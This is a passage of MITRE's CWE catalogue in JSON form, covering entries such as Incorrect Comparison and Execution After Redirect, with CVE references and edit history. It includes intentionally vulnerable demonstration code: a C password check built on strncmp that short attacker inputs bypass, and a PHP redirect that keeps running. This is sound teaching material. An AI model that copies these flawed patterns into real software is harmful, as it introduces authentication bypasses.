corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9805"},{"Reference":"CVE-2007-5191","Description":"file-system management programs call the setuid and setgid functions in the wrong order and do not check the return values, allowing attackers to gain unintended privileges","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5191"},{"Reference":"CVE-2007-1588","Description":"C++ web server program calls Process::setuid before calling Process::setgid, preventing it from dropping privileges, potentially allowing CGI programs to be called with higher privileges than intended","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1588"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS36-C","Entry_Name":"Observe correct revocation order while relinquishing privileges","Mapping_Fit":"CWE More Abstract"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"463"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}]}},"697":{"attr":{"@_ID":"697","@_Name":"Incorrect Comparison","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software compares two entities in a security-relevant context, but the comparison is incorrect, which may lead to resultant weaknesses.","Extended_Description":{"xhtml:p":"This weakness class covers several possibilities:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["the comparison checks one factor incorrectly;","the comparison should consider multiple factors, but it does not check some of those factors at all;","the comparison checks the wrong factor."]}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-115"},"Intro_Text":"Consider an application in which Truck objects are defined to be the same if they have the same make, the same model, and were manufactured in the same year.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Truck {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String make;private String model;private int year;public boolean equals(Object o) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (o == null) return false;if (o == this) return true;if (!(o instanceof Truck)) return false;Truck t = (Truck) o;return (this.make.equals(t.getMake()) && this.model.equals(t.getModel()));","xhtml:br":["","","","","",""]}}}}}},"Body_Text":"Here, the equals() method only checks the make and model of the Truck objects, but the year of manufacture is not included."},{"attr":{"@_Demonstrative_Example_ID":"DX-116"},"Intro_Text":"This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *username = \\"admin\\";char *pass = \\"password\\";int AuthenticateUser(char *inUser, char *inPass) {}int main (int argc, char **argv) {}","xhtml:i":"/* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"if (strncmp(username, inUser, strlen(inUser))) {}if (! strncmp(pass, inPass, strlen(inPass))) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"logEvent(\\"Auth failure of username using strlen of inUser\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth success of password using strlen of inUser\\");return(AUTH_SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth fail of password using sizeof\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]},{"#text":"int authResult;if (argc < 3) {}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Usage: Provide a username and password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAuthenticatedTask(argv[1]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Authentication failed\\");","attr":{"@_style":"margin-left:10px;"}}]}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"ppapaspass","xhtml:br":["","",""]}}],"Body_Text":["In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application\'s password before determining success.","As a result, this partial comparison leads to improper authentication (CWE-287).","Any of these passwords would still cause authentication to succeed for the \\"admin\\" user:","This significantly reduces the search space for an attacker, making brute force attacks more feasible.","The same problem also applies to the username, so values such as \\"a\\" and \\"adm\\" will succeed for the username.","While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness."]}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2016-10003","Description":"Proxy performs incorrect comparison of request headers, leading to infoleak","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10003"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"182"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"34"}},{"attr":{"@_CAPEC_ID":"41"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"44"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"7"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"80"}},{"attr":{"@_CAPEC_ID":"88"}},{"attr":{"@_CAPEC_ID":"9"}},{"attr":{"@_CAPEC_ID":"92"}}]},"Notes":{"Note":{"#text":"This entry likely has some relationships with case sensitivity (CWE-178), but case sensitivity is a factor in other types of weaknesses besides comparison. Also, in cryptography, certain attacks are possible when certain comparison operations do not take place in constant time, causing a timing-related information leak (CWE-208).","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Insufficient Comparison","attr":{"@_Date":"2018-03-27"}}}},"698":{"attr":{"@_ID":"698","@_Name":"Execution After Redirect (EAR)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application sends a redirect to another location, but instead of exiting, it executes additional code.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Alternate_Terms":{"Alternate_Term":{"Term":"Redirect Without Exit"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Other","Confidentiality","Integrity","Availability"],"Impact":["Alter Execution Logic","Execute Unauthorized Code or Commands"],"Note":"This weakness could affect the control flow of the application and allow execution of untrusted code."}},"Detection_Methods":{"Detection_Method":{"Method":"Black Box","Description":"This issue might not be detected if testing is performed using a web browser, because the browser might obey the redirect and move the user to a different page before the application has produced outputs that indicate something is amiss."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code queries a server and displays its status when a request comes from an authorized IP address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$requestingIP = $_SERVER[\'REMOTE_ADDR\'];if(!in_array($requestingIP,$ipAllowList)){}$status = getServerStatus();echo $status;","xhtml:br":["","","","",""],"xhtml:div":{"#text":"echo \\"You are not authorized to view this page\\";http_redirect($errorPageURL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:i":"..."}},"Body_Text":"This code redirects unauthorized users, but continues to execute code after calling http_redirect(). This means even unauthorized users may be able to access the contents of the page or perform a DoS attack on the server being queried. Also, note that this code is vulnerable to an IP address spoofing attack (CWE-212)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2013-1402","Description":"Execution-after-redirect allows access to application configuration details.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1402"},{"Reference":"CVE-2009-1936","Description":"chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1936"},{"Reference":"CVE-2007-2713","Description":"Remote attackers can obtain access to administrator functionality through EAR.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2713"},{"Reference":"CVE-2007-4932","Description":"Remote attackers can obtain access to administrator functionality through EAR.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4932"},{"Reference":"CVE-2007-5578","Description":"Bypass of authentication step through EAR.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5578"},{"Reference":"CVE-2007-2713","Description":"Chain: Execution after redirect triggers eval injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2713"},{"Reference":"CVE-2007-6652","Description":"chain: execution after redirect allows non-administrator to perform static code injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6652"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-565"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Name, Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Redirect Without Exit","attr":{"@_Date":"2013-02-21"}}}},"703":{"attr":{"@_ID":"703","@_Name":"Improper Check or Handling of Exceptional Conditions","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly anticipate or handle exceptional conditions that rarely occur during normal operation of the software.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Availability","Integrity"],"Impact":["Read Application Data","DoS: Crash, Exit, or Restart","Unexpected State"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fault Injection - source code","Fault Injection - binary"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Forced Path Execution"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR06-J","Entry_Name":"Do not throw undeclared checked exceptions"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-567"}},{"attr":{"@_External_Reference_ID":"REF-568"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 8: C++ Catastrophes." Page 143"}}]},"Notes":{"Note":{"#text":"This is a high-level class that might have some overlap with other classes. It could be argued that even \\"normal\\" weaknesses such as buffer overflows involve unusual or exceptional conditions. In that sense, this might be an inherent aspect of most other weaknesses within CWE, similar to API Abuse (CWE-227) and Indicator of Poor Code Quality (CWE-398). However, this entry is currently intended to unify disparate concepts that do not have other places within the Research Concepts view (CWE-1000).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Handle Exceptional Conditions","attr":{"@_Date":"2010-12-13"}}}},"704":{"attr":{"@_ID":"704","@_Name":"Incorrect Type Conversion or Cast","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not correctly convert an object, resource, or structure from one type to a different type.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP05-C","Entry_Name":"Do not cast away a const qualification"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP39-C","Entry_Name":"Do not access a variable through a pointer of an incompatible type","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT36-C","Entry_Name":"Converting a pointer to integer or integer to pointer","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR34-C","Entry_Name":"Cast characters to unsigned types before converting to larger integer sizes","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR37-C","Entry_Name":"Arguments to character handling functions must be representable as an unsigned char","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-704"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-704"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"705":{"attr":{"@_ID":"705","@_Name":"Incorrect Control Flow Scoping","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly return control flow to the proper location after it has completed a task or detected an unusual condition.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Alter Execution Logic","Other"]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV32-C","Entry_Name":"All exit handlers must return normally","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR04-C","Entry_Name":"Choose an appropriate termination strategy"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"THI05-J","Entry_Name":"Do not use Thread.stop() to terminate threads"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR04-J","Entry_Name":"Do not complete abruptly from a finally block"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR05-J","Entry_Name":"Do not let checked exceptions escape from a finally block"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"Imprecise"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric 